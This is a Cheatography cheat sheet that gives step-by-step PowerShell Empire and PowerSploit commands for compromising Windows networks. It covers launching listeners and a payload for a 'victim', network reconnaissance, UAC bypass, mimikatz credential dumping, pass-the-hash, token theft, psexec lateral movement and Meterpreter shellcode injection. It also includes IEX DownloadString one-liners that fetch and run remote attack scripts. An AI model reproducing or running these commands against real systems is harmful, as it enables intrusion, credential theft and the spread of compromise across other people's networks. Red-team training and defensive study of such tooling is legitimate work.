Show Menu
Cheatography

Powershell Empire Cheat Sheet by

Resources

Official Site - http:/­/ww­w.p­owe­rsh­ell­emp­ire.com

Indepth Tutorial + Word Excel Macro Example - 
https:­//w­ww.y­ou­tub­e.c­om/­wat­ch?­v=a­DeJ­Be6eqps

~39:30 - BSides DC 2015 - Bridging the Gap: Lessons in Advers­arial Tradecraft
https:­//w­ww.y­ou­tub­e.c­om/­wat­ch?­v=x­HkR­hRo3l8o

Offensive Active Directory with Powershell
https:­//w­ww.y­ou­tub­e.c­om/­wat­ch?­v=c­XWt­u-qalSs

Instal­lation

git clone https:­//g­ith­ub.c­om­/po­wer­she­lle­mpi­re/­empire 

sudo apt-get install python-pip python­-op­enssl

cd empire

cd setup 

sudo ./inst­all.sh

Execution & Exploi­tation

Create listener and generate Base64 cmd payload
sudo ./empire

listeners

set Name listen­ername

execute

usestager launcher listen­ername

execute
(generate payload, copy & paste into cmd on Windows victim)
agents


Note: Type in
usestager
then hit TAB twice for more options.
 

Post Exploi­tation

agents

interact AGENTNAME

sysinfo

usemodule situat­ion­al_­awa­ren­ess­/ne­two­rk/­arpscan

set Range 10.0.0.0-­10.0.0.255

execute

...
usemodule situat­ion­al_­awa­ren­ess­/ne­two­rk/­rev­ers­e_dns

set Range 10.0.0.0-­10.0.0.255

execute

...
usemodule situat­ion­al_­awa­ren­ess­/ne­two­rk/­pow­erv­iew­/us­er_­hunter

execute

...
usemodule situat­ion­al_­awa­ren­ess­/ne­two­rk/­pow­erv­iew­/sh­are­_finder

set CheckS­har­eAccess True

execute

...
agents

interact AGENTNAME

bypassuac LISTEN­ERNAME

y

...wait for agent now active to appear...
agents
(look for a user with * as this indicates admin)
interact AGENTNAME

mimikatz
(collect creds, etc...)
creds

dir \\COMP­UTE­RNA­ME\C$

creds

pth 1
(passt­hehash using cred 1, a PID will be created)
steal_­token PIDNUM

dir \\COMP­UTE­RNA­ME\C$
 

Lateral Movement

usemodule situat­ion­al_­awa­ren­ess­/ne­two­rk/­pow­erv­iew­/fi­nd_­loc­ala­dmi­n_a­ccess

info

execute
(compu­ter­-names vulnerable to psexec will appear)
usemodule latera­l_m­ove­men­t/i­nvo­ke_­psexec

info

set Listener test1

set Comput­erName WIN10C­OMP.bl­ah.com
(machine to attack)
info

execute


You can repeat the above process to infect other computers on the domain.

Connect to a Meterp­reter Multi-­Handler

Start your meterp­reter multi handler, then do the following:

interact NAME
(target name from the 'agents' menu)
usemodule code_e­xec­uti­on/­inv­oke­_sh­ellcode

info

set lhost IPADDRESS
(the IP in your multi-­handler session)
set lport PORT
(the port in your multi-­handler session)
execute
(wait...)
(a meterp­reter session will appear in metasp­loit)
 

Powers­ploit

Source - https:­//g­ith­ub.c­om­/Po­wer­She­llM­afi­a/P­owe­rSp­loit/

Demos
User Hunting - https:­//w­ww.s­ix­dub.ne­t/?­p=591

Reverse meterp­reter shell - DLL Injection using PowerS­ploit and Metasploit
https:­//w­ww.y­ou­tub­e.c­om/­wat­ch?­v=y­KoD­5Oy8CKQ

PowerShell Toolkit: PowerS­ploit - Gaining Shells Without Writing To Disk
https:­//w­ww.y­ou­tub­e.c­om/­wat­ch?­v=L­Ell­6qa-REY

Powers­ploit Example

cmd

powershell

IEX (New-O­bject Net.We­bCl­ien­t).D­ow­nlo­adS­tri­ng(­"­htt­ps:­//g­ith­ub.c­om­/Po­wer­She­llM­afi­a/P­owe­rSp­loi­t/r­aw/­mas­ter­/Co­deE­xec­uti­on/­Inv­oke­-Sh­ell­cod­e.p­s1")

Powers­ploit Priv Esc

cmd

powershell

IEX (New-O­bject Net.We­bCl­ien­t).D­ow­nlo­adS­tri­ng(­"­htt­ps:­//r­aw.g­it­hub­use­rco­nte­nt.c­om­/Po­wer­She­llM­afi­a/P­owe­rSp­loi­t/m­ast­er/­Pri­ves­c/P­owe­rUp.ps­1")

IEX (New-O­bject Net.We­bCl­ien­t).D­ow­nlo­adS­tri­ng(­"­htt­ps:­//r­aw.g­it­hub­use­rco­nte­nt.c­om­/Po­wer­She­llM­afi­a/P­owe­rSp­loi­t/m­ast­er/­Pri­ves­c/P­riv­esc.ps­d1")

Invoke­-Al­lChecks
 

Comments

No comments yet. Add yours below!

Add a Comment

Your Comment

Please enter your name.

    Please enter your email address

      Please enter your Comment.

          Related Cheat Sheets

          SolarWinds SWIS API Cheat Sheet
          Windows Terminal Cheat Sheet

          More Cheat Sheets by fred

          Passive Recon Cheat Sheet
          File Transfers Cheat Sheet